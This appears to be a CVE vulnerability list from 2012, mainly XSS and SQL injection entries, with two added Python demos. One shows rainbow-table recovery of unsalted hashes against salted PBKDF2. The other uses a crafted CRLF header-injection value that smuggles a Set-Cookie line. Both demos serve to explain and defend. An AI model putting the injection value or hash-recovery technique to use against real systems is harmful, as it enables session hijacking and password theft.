[CVE-2012-2595] Multiple cross-site scripting (XSS) vulnerabilities in unspecified web applications in Siemens WinCC 7.0 SP3 before Update 2 allow remote attackers to inject arbitrary web script or HTML via vectors involving special characters in parameters.
[CVE-2012-2590] Multiple cross-site scripting (XSS) vulnerabilities in ESCON SupportPortal Professional Edition 3.0 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted SRC attribute of an IFRAME element, (3) a crafted CONTENT attribute of an HTTP-EQUIV="Set-Cookie" META element, or (4) an innerHTML attribute within an XML document.
[CVE-2012-2587] Multiple cross-site scripting (XSS) vulnerabilities in AfterLogic MailSuite Pro 6.3 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with a crafted SRC attribute of (1) an IFRAME element or (2) a SCRIPT element.
[CVE-2012-2586] Multiple cross-site scripting (XSS) vulnerabilities in Mailtraq 2.17.3.3150 allow remote attackers to inject arbitrary web script or HTML via an e-mail message subject with (1) a JavaScript alert function used in conjunction with the fromCharCode method or (2) a SCRIPT element.
[CVE-2012-2585] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ServiceDesk Plus 8.1 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, or (4) a crafted SRC attribute of an IFRAME element, or an e-mail message subject with (5) a SCRIPT element, (6) a CSS expression property in the STYLE attribute of an arbitrary element, (7) a crafted SRC attribute of an IFRAME element, (8) a crafted CONTENT attribute of an HTTP-EQUIV="refresh" META element, or (9) a data: URL in the CONTENT attribute of an HTTP-EQUIV="refresh" META element.
[CVE-2012-2584] Multiple cross-site scripting (XSS) vulnerabilities in Alt-N MDaemon Free 12.5.4 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) the Cascading Style Sheets (CSS) expression property in conjunction with a CSS comment within the STYLE attribute of an IMG element, (2) the CSS expression property in conjunction with multiple CSS comments within the STYLE attribute of an arbitrary element, or (3) an innerHTML attribute within an XML document.
[CVE-2012-2582] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.13, 3.0.x before 3.0.15, and 3.1.x before 3.1.9, and OTRS ITSM 2.1.x before 2.1.5, 3.0.x before 3.0.6, and 3.1.x before 3.1.6, allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a Cascading Style Sheets (CSS) expression property in the STYLE attribute of an arbitrary element or (2) UTF-7 text in an HTTP-EQUIV="CONTENT-TYPE" META element.
[CVE-2012-2578] Multiple cross-site scripting (XSS) vulnerabilities in SmarterMail 9.2 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a JavaScript alert function used in conjunction with the fromCharCode method, (2) a SCRIPT element, (3) a Cascading Style Sheets (CSS) expression property in the STYLE attribute of an arbitrary element, or (4) an innerHTML attribute within an XML document.
[CVE-2012-2577] Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds Orion Network Performance Monitor (NPM) before 10.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) syslocation, (2) syscontact, or (3) sysName field of an snmpd.conf file.
[CVE-2012-2575] Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 6.0a4 allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of an IFRAME element in the body of an HTML e-mail message.
[CVE-2012-2574] SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to a "blind SQL injection" issue.
[CVE-2012-2573] Multiple cross-site scripting (XSS) vulnerabilities in T-dah WebMail 3.2.0-2.3 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, (4) an ONLOAD attribute of a BODY element, (5) a crafted SRC attribute of an IFRAME element, (6) a crafted CONTENT attribute of an HTTP-EQUIV="refresh" META element, or (7) a data: URL in the CONTENT attribute of an HTTP-EQUIV="refresh" META element.
[CVE-2012-2571] Multiple cross-site scripting (XSS) vulnerabilities in WinWebMail Server 3.8.1.6 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, (4) a crafted SRC attribute of an IFRAME element, or (5) UTF-7 text in an HTTP-EQUIV="CONTENT-TYPE" META element.
[CVE-2012-2570] Cross-site scripting (XSS) vulnerability in products_map.php in X-Cart Gold 4.5 allows remote attackers to inject arbitrary web script or HTML via the symb parameter.
[CVE-2012-2568] d41d8cd98f00b204e9800998ecf8427e.php in the management web server on the Seagate BlackArmor device allows remote attackers to change the administrator password via unspecified vectors.
[CVE-2012-2566] Bloxx Web Filtering before 5.0.14 does not properly interpret X-Forwarded-For headers during access-control and logging operations for HTTPS connection attempts, which allows remote attackers to bypass intended IP address and domain restrictions, and trigger misleading log entries, via a crafted header.
[CVE-2012-2565] Bloxx Web Filtering before 5.0.14 does not use a salt during calculation of a password hash, which makes it easier for context-dependent attackers to determine cleartext passwords via a rainbow-table approach.
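CVE-2012-2565 describes an unsalted password hash, which is what makes a rainbow-table or other precomputation attack worthwhile: every account with the same password stores the same digest, so one precomputed table covers all of them. The added example below is not Bloxx code; it contrasts that behaviour with a per-user random salt and PBKDF2 (the stored-record format and the candidate password list are constructed for the demonstration).

```python
import hashlib
import hmac
import os


def unsalted_hash(password):
    """What an unsalted store does: identical passwords give identical digests."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_table(candidates):
    """Precompute digest -> password for a candidate list. One table serves every
    account in an unsalted store; a real rainbow table only compresses this idea."""
    return {unsalted_hash(p): p for p in candidates}


def recover_with_table(stored_digest, table):
    """Constant-time-irrelevant lookup: the attacker already has the digests."""
    return table.get(stored_digest)


def salted_hash(password, salt=None, iterations=200_000):
    """Salted, iterated hash. Record format is hypothetical: alg$iters$salt$dk."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per stored password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_salted(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    alg, iters, salt_hex, dk_hex = stored.split("$")
    if alg != "pbkdf2_sha256":
        raise ValueError("unsupported record: %s" % alg)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed candidate list standing in for a wordlist.
    table = build_table(["password", "Summer2012", "letmein"])
    leaked = unsalted_hash("Summer2012")
    print("unsalted digest recovered from table:", recover_with_table(leaked, table))
    a, b = salted_hash("Summer2012"), salted_hash("Summer2012")
    print("same password, two salted records differ:", a != b)
    print("verify correct password:", verify_salted("Summer2012", a))
```

With a salt the attacker must redo the work once per account and per salt, and the iteration count makes each attempt cost more; the constant-time comparison in `verify_salted` avoids leaking how many leading bytes of a guess matched.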
[CVE-2012-2563] Multiple cross-site scripting (XSS) vulnerabilities in Bloxx Web Filtering before 5.0.14 allow (1) remote attackers to inject arbitrary web script or HTML via web traffic that is examined within the Bloxx Reports component, and allow (2) remote authenticated administrators to inject arbitrary web script or HTML via vectors involving administrative menu functions.
[CVE-2012-2557] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "cloneNode Use After Free Vulnerability."
[CVE-2012-2552] Cross-site scripting (XSS) vulnerability in the SQL Server Report Manager in Microsoft SQL Server 2000 Reporting Services SP2 and SQL Server 2005 SP4, 2008 SP2 and SP3, 2008 R2 SP1, and 2012 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Reflected XSS Vulnerability."
[CVE-2012-2548] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Layout Use After Free Vulnerability."
[CVE-2012-2546] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Event Listener Use After Free Vulnerability."
[CVE-2012-2536] Cross-site scripting (XSS) vulnerability in Microsoft Systems Management Server 2003 SP3 and System Center Configuration Manager 2007 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Reflected XSS Vulnerability."
[CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability."
[CVE-2012-2500] Cisco AnyConnect Secure Mobility Client 3.0 before 3.0.08057 does not verify the certificate name in an X.509 certificate during WebLaunch of IPsec, which allows man-in-the-middle attackers to spoof servers via a crafted certificate, aka Bug ID CSCtz29470.
[CVE-2012-2496] A certain Java applet in the VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 3.x before 3.0 MR7 on 64-bit Linux platforms does not properly restrict use of Java components, which allows remote attackers to execute arbitrary code via a crafted web site, aka Bug ID CSCty45925.
[CVE-2012-2494] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 and 3.x before 3.0 MR8 does not compare the timestamp of offered software to the timestamp of installed software, which allows remote attackers to force a version downgrade by using (1) ActiveX or (2) Java components to offer signed code that corresponds to an older software release, aka Bug ID CSCtw48681.
[CVE-2012-2493] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 on Windows, and 2.x before 2.5 MR6 and 3.x before 3.0 MR8 on Mac OS X and Linux, does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug ID CSCtw47523.
[CVE-2012-2474] Memory leak on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.2 through 8.4 allows remote authenticated users to cause a denial of service (memory consumption and blank response page) by using the clientless WebVPN feature, aka Bug ID CSCth34278.
[CVE-2012-2447] Cross-site request forgery (CSRF) vulnerability in accountmgr/adminupdate.php in the WebAdmin Portal in Netsweeper allows remote attackers to hijack the authentication of administrators for requests that create administrative accounts via an add action.
[CVE-2012-2446] Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in the WebAdmin Portal in Netsweeper allows remote attackers to inject arbitrary web script or HTML via the group parameter in a lookup action.
[CVE-2012-2438] ar web content manager (AWCM) 2.2 does not restrict the number of comment records that can be submitted through HTTP requests, which allows remote attackers to cause a denial of service (disk consumption) via the coment parameter to (1) show_video.php or (2) topic.php.
[CVE-2012-2437] cookie_gen.php in ar web content manager (AWCM) 2.2 does not require authentication, which allows remote attackers to generate arbitrary cookies via the name parameter in conjunction with the content parameter.
[CVE-2012-2436] Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter in a (1) move or (2) minimize action to admin/admin_index.php.
[CVE-2012-2414] main/manager.c in the Manager Interface in Asterisk Open Source 1.6.2.x before 1.6.2.24, 1.8.x before 1.8.11.1, and 10.x before 10.3.1 and Asterisk Business Edition C.3.x before C.3.7.4 does not properly enforce System class authorization requirements, which allows remote authenticated users to execute arbitrary commands via (1) the originate action in the MixMonitor application, (2) the SHELL and EVAL functions in the GetVar manager action, or (3) the SHELL and EVAL functions in the Status manager action.
[CVE-2012-2399] Cross-site scripting (XSS) vulnerability in swfupload.swf in SWFupload 2.2.0.1 and earlier, as used in WordPress before 3.5.2, TinyMCE Image Manager 1.1 and earlier, and other products allows remote attackers to inject arbitrary web script or HTML via the buttonText parameter, a different vulnerability than CVE-2012-3414.
[CVE-2012-2398] Cross-site scripting (XSS) vulnerability in files/ajax/download.php in ownCloud before 3.0.3 allows remote attackers to inject arbitrary web script or HTML via the files parameter, a different vulnerability than CVE-2012-2269.
[CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
[CVE-2012-2374] CRLF injection vulnerability in the tornado.web.RequestHandler.set_header function in Tornado before 2.2.1 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted input.
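CVE-2012-2374 is the classic CRLF injection in a header-setting API: a CR or LF inside a header value ends that header on the wire, so attacker-controlled text (for example a redirect target echoed into Location) can start a new header such as Set-Cookie or even a new response body. The added example below is not Tornado's code; it shows a naive header serialiser with and without the value check a fixed API performs, on a constructed attacker-supplied value.

```python
import re

# Any CR or LF in a header name or value breaks the header framing.
_CRLF = re.compile(r"[\r\n]")


class HeaderInjection(ValueError):
    """Raised when a header name or value would split the response."""


def safe_header_value(value):
    """Return the value unchanged if it contains no CR/LF, else raise."""
    if _CRLF.search(value):
        raise HeaderInjection("CR/LF in header value: %r" % value)
    return value


def unchecked_response_headers(headers):
    """Unsafe serialiser (kept only to show what the check prevents)."""
    lines = ["%s: %s" % (name, value) for name, value in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def checked_response_headers(headers):
    """Same serialiser, but every name and value is checked first."""
    lines = []
    for name, value in headers.items():
        if _CRLF.search(name):
            raise HeaderInjection("CR/LF in header name: %r" % name)
        lines.append("%s: %s" % (name, safe_header_value(value)))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def parse_headers(raw):
    """What a client sees: split the header block into (name, value) pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b": ")
        pairs.append((name.decode("latin-1"), value.decode("latin-1")))
    return pairs


if __name__ == "__main__":
    # Constructed attacker input: a redirect parameter carrying CRLF + Set-Cookie.
    evil = "/home?lang=en\r\nSet-Cookie: session=attacker-chosen"
    print(parse_headers(unchecked_response_headers({"Location": evil})))
    try:
        checked_response_headers({"Location": evil})
    except HeaderInjection as exc:
        print("rejected:", exc)
```

The client-side view in `parse_headers` is the useful check when testing a real server: if a value you supplied in a request shows up as a separate header line in the response, the server is splittable. Rejecting rather than silently stripping CR/LF is the better default, because stripping can turn a rejected value into a different but still attacker-shaped one.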
[CVE-2012-2372] The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel 3.7.4 and earlier allows local users to cause a denial of service (BUG_ON and kernel panic) by establishing an RDS connection with the source IP address equal to the IPoIB interface's own IP address, as demonstrated by rds-ping.
[CVE-2012-2371] Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
[CVE-2012-2365] Cross-site scripting (XSS) vulnerability in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via the idnumber field to cohort/edit.php.
[CVE-2012-2364] Cross-site scripting (XSS) vulnerability in lib/filelib.php in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via an assignment submission with zip compression, leading to text/html rendering during a "download all" action.
[CVE-2012-2362] Cross-site scripting (XSS) vulnerability in blog/lib.php in the blog implementation in Moodle 1.9.x before 1.9.18, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via a crafted parameter to blog/index.php.
[CVE-2012-2361] Cross-site scripting (XSS) vulnerability in admin/webservice/forms.php in the web services implementation in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via the name field (aka the service name) to admin/webservice/service.php.
[CVE-2012-2360] Cross-site scripting (XSS) vulnerability in the Wiki subsystem in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted string that is inserted into a page title.
[CVE-2012-2339] Cross-site scripting (XSS) vulnerability in the Glossary module 6.x-1.x before 6.x-1.8 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "taxonomy information."
[CVE-2012-2331] Cross-site scripting (XSS) vulnerability in serendipity/serendipity_admin_image_selector.php in Serendipity before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the serendipity[textarea] parameter. NOTE: this issue might be resultant from cross-site request forgery (CSRF).
[CVE-2012-2326] Cross-site scripting (XSS) vulnerability in the Admin Control Panel (ACP) in MyBB (aka MyBulletinBoard) before 1.6.7 allows remote administrators to inject arbitrary web script or HTML via a malformed file name in an orphaned attachment.
[CVE-2012-2310] Cross-site scripting (XSS) vulnerability in the cctags module for Drupal 6.x-1.x before 6.x-1.10 and 7.x-1.x before 7.x-1.10 allows remote authenticated users with certain roles to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2309] Cross-site scripting (XSS) vulnerability in the Glossify Internal Links Auto SEO module for Drupal 6.x-2.5 and earlier allows remote authenticated users with certain roles to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2308] Cross-site scripting (XSS) vulnerability in the Taxonomy Grid : Catalog module for Drupal 6.x-1.6 and earlier allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2300] Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart module 6.x-2.x before 6.x-2.8 and 7.x-3.x before 7.x-3.1 for Drupal allow remote authenticated users with the administer product classes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2298] Multiple cross-site scripting (XSS) vulnerabilities in the RealName module 6.x-1.x before 6.x-1.5 for Drupal allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) "user names in page titles" and (2) "autocomplete callbacks."
[CVE-2012-2297] Multiple cross-site scripting (XSS) vulnerabilities in the Creative Commons module 6.x-1.x before 6.x-1.1 for Drupal allow remote authenticated users with the administer creative commons permission to inject arbitrary web script or HTML via the (1) creativecommons_user_message or (2) creativecommons_site_license_additional_text parameter.
[CVE-2012-2294] EMC RSA Archer SmartSuite Framework 4.x and RSA Archer GRC 5.x before 5.2SP1 allow remote attackers to conduct clickjacking attacks via a crafted web page.
[CVE-2012-2289] EMC ApplicationXtender Desktop before 6.5 SP2 and ApplicationXtender Web Access .NET before 6.5 SP2 allow remote attackers to upload files to any location, and possibly execute arbitrary code, via unspecified vectors.
[CVE-2012-2280] EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID Appliance 3.0 before SP4 P14 do not properly use frames, which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "Cross frame scripting vulnerability."
[CVE-2012-2279] Open redirect vulnerability in the Security Console in EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID Appliance 3.0 before SP4 P14 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-2278] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Self-Service Console and (2) Security Console in EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID Appliance 3.0 before SP4 P14 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2274] Cross-site scripting (XSS) vulnerability in pivotx/ajaxhelper.php in PivotX 2.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2012-2270] Open redirect vulnerability in index.php (aka the Login Page) in ownCloud before 3.0.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_url parameter.
[CVE-2012-2269] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 3.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) an arbitrary field to apps/contacts/ajax/addcard.php, (2) the parameter parameter to apps/contacts/ajax/addproperty.php, (3) the name parameter to apps/contacts/ajax/createaddressbook, (4) the file parameter to files/download.php, or the (5) name, (6) user, or (7) redirect_url parameter to files/index.php.
[CVE-2012-2253] Cross-site scripting (XSS) vulnerability in group/members.php in Mahara 1.5.x before 1.5.7 and 1.6.x before 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2012-2247] Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to inject arbitrary web script or HTML via vectors related to artefact/file/ and a crafted SVG file.
[CVE-2012-2243] Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to inject arbitrary web script or HTML by uploading an XML file with the xhtml extension, which is rendered inline as script. NOTE: this can be leveraged with CVE-2012-2244 to execute arbitrary code without authentication, as demonstrated by modifying the clamav path.
[CVE-2012-2235] Cross-site scripting (XSS) vulnerability in Support Incident Tracker (SiT!) 3.65 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter to index.php, which is not properly handled in an error message.
[CVE-2012-2234] Cross-site scripting (XSS) vulnerability in sources/users.queries.php in TeamPass before 2.1.6 allows remote authenticated users to inject arbitrary web script or HTML via the login parameter in an add_new_user action.
[CVE-2012-2212] ** DISPUTED ** McAfee Web Gateway 7.0 allows remote attackers to bypass the access configuration for the CONNECT method by providing an arbitrary allowed hostname in the Host HTTP header. NOTE: this issue might not be reproducible, because the researcher did not provide configuration details for the vulnerable system, and the observed behavior might be consistent with a configuration that was (perhaps inadvertently) designed to allow access based on Host HTTP headers.
[CVE-2012-2211] Cross-site scripting (XSS) vulnerability in phpgwapi/inc/common_functions_inc.php in eGroupware before 1.8.004.20120405 allows remote attackers to inject arbitrary web script or HTML via the menuaction parameter to etemplate/process_exec.php. NOTE: some of these details are obtained from third party information.
[CVE-2012-2209] Multiple cross-site scripting (XSS) vulnerabilities in admin.php in Piwigo before 2.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) section parameter in the configuration module, (2) installstatus parameter in the languages_new module, or (3) theme parameter in the theme module.
[CVE-2012-2206] The Web Gateway component in IBM WebSphere MQ File Transfer Edition 7.0.4 and earlier allows remote authenticated users to read files of arbitrary users via vectors involving a username in a URI, as demonstrated by a modified metadata=fteSamplesUser field to the /transfer URI.
[CVE-2012-2205] Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a workspace query.
[CVE-2012-2199] The server message channel agent in the queue manager in the server in IBM WebSphere MQ 7.0.1 before 7.0.1.9, 7.1, and 7.5 on Solaris allows remote attackers to cause a denial of service (invalid address alignment exception and daemon crash) via vectors involving a multiplexed channel.
[CVE-2012-2193] Cross-site scripting (XSS) vulnerability in Query Studio in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows user-assisted remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2190] IBM Global Security Kit (aka GSKit), as used in IBM HTTP Server in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.4, and 8.5.x before 8.5.0.1, allows remote attackers to cause a denial of service (daemon crash) via a crafted ClientHello message in the TLS Handshake Protocol.
[CVE-2012-2184] Session fixation vulnerability in IBM Maximo Asset Management 7.1 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2012-2183] Session fixation vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2012-2181] Directory traversal vulnerability in the Dojo module in IBM WebSphere Portal 7.0.0.1 and 7.0.0.2 before CF14, and 8.0, allows remote attackers to read arbitrary files via a crafted URL.
[CVE-2012-2177] Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors related to the search feature.
[CVE-2012-2172] Cross-site scripting (XSS) vulnerability in SoftwareRegistration.do in the Storage Manager Profiler in IBM System Storage DS Storage Manager before 10.83.xx.18 on DS Series devices allows remote attackers to inject arbitrary web script or HTML via the updateRegn parameter.
[CVE-2012-2170] The Application Snoop Servlet in IBM WebSphere Application Server 7.0 before 7.0.0.23 does not properly restrict access, which allows remote attackers to obtain sensitive client and request information via a direct request.
[CVE-2012-2169] Cross-site scripting (XSS) vulnerability in the file-upload functionality in the Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 allows remote authenticated users to inject arbitrary web script or HTML via the File Description field.
[CVE-2012-2164] The Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to bypass intended access restrictions, and use the Site Administration menu to modify system settings, via a parameter-tampering attack.
[CVE-2012-2163] IBM Scale Out Network Attached Storage (SONAS) 1.1 through 1.3.1 allows remote authenticated administrators to execute arbitrary Linux commands via the (1) Command Line Interface or (2) Graphical User Interface, related to a "code injection" issue.
[CVE-2012-2162] The Web Server Plug-in in IBM WebSphere Application Server (WAS) 8.0 and earlier uses unencrypted HTTP communication after expiration of the plugin-key.kdb password, which allows remote attackers to obtain sensitive information by sniffing the network, or spoof arbitrary servers via a man-in-the-middle attack.
[CVE-2012-2161] Cross-site scripting (XSS) vulnerability in deferredView.jsp in IBM Eclipse Help System (IEHS), as used in IBM Security AppScan Source 7.x and 8.x before 8.6 and IBM SPSS Data Collection Developer Library 6.0 and 6.0.1, allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2012-2159] Open redirect vulnerability in IBM Eclipse Help System (IEHS), as used in IBM Security AppScan Source 7.x and 8.x before 8.6 and IBM SPSS Data Collection Developer Library 6.0 and 6.0.1, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-2156] Multiple cross-site scripting (XSS) vulnerabilities in Plume CMS 1.2.4 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the u_email parameter (aka Authors Email field) to manager/users.php, (2) the u_realname parameter (aka Authors Name field) to manager/users.php, or (3) the c_author parameter (aka Author field) in an ADD A COMMENT section.
[CVE-2012-2154] Cross-site scripting (XSS) vulnerability in the CDN2 Video module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2151] Multiple cross-site scripting (XSS) vulnerabilities in SPIP 1.9.x before 1.9.2.o, 2.0.x before 2.0.18, and 2.1.x before 2.1.13 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2144] Session fixation vulnerability in OpenStack Dashboard (Horizon) folsom-1 and 2012.1 allows remote attackers to hijack web sessions via the sessionid cookie.
[CVE-2012-2129] Cross-site scripting (XSS) vulnerability in doku.php in DokuWiki 2012-01-25 Angua allows remote attackers to inject arbitrary web script or HTML via the target parameter in an edit action.
[CVE-2012-2117] Cross-site scripting (XSS) vulnerability in the Gigya - Social optimization module 6.x before 6.x-3.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2115] SQL injection vulnerability in interface/login/validateUser.php in OpenEMR 4.1.0 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the u parameter.
[CVE-2012-2112] Cross-site scripting (XSS) vulnerability in the Exception Handler in TYPO3 4.4.x before 4.4.15, 4.5.x before 4.5.15, 4.6.x before 4.6.8, and 4.7 allows remote attackers to inject arbitrary web script or HTML via exception messages.
[CVE-2012-2099] Multiple cross-site scripting (XSS) vulnerabilities in Wikidforum 2.10 allow remote attackers to inject arbitrary web script or HTML via the (1) search field, or the (2) Author or (3) select_sort parameters in an advanced search.
[CVE-2012-2094] Cross-site scripting (XSS) vulnerability in the refresh mechanism in the log viewer in horizon/static/horizon/js/horizon.js in OpenStack Dashboard (Horizon) folsom-1 and 2012.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the guest console.
[CVE-2012-2084] Cross-site scripting (XSS) vulnerability in the Printer, email and PDF versions module 6.x-1.x before 6.x-1.15 and 7.x-1.x before 7.x-1.0 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably the PATH_INFO.
[CVE-2012-2083] Cross-site scripting (XSS) vulnerability in the fusion_core_preprocess_page function in fusion_core/template.php in the Fusion module before 6.x-1.13 for Drupal allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2012-2082] Cross-site scripting (XSS) vulnerability in the Chaos tool suite (aka CTools) module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the post comments permission to inject arbitrary web script or HTML via a user signature.
[CVE-2012-2076] Cross-site scripting (XSS) vulnerability in the administration forms in the ShareThis module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with administer sharethis permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2075] Cross-site scripting (XSS) vulnerability in the Contact Save module 6.x-1.x before 6.x-1.5 for Drupal allows remote authenticated users with the access site-wide contact form permission to inject arbitrary web script or HTML via unspecified vectors.
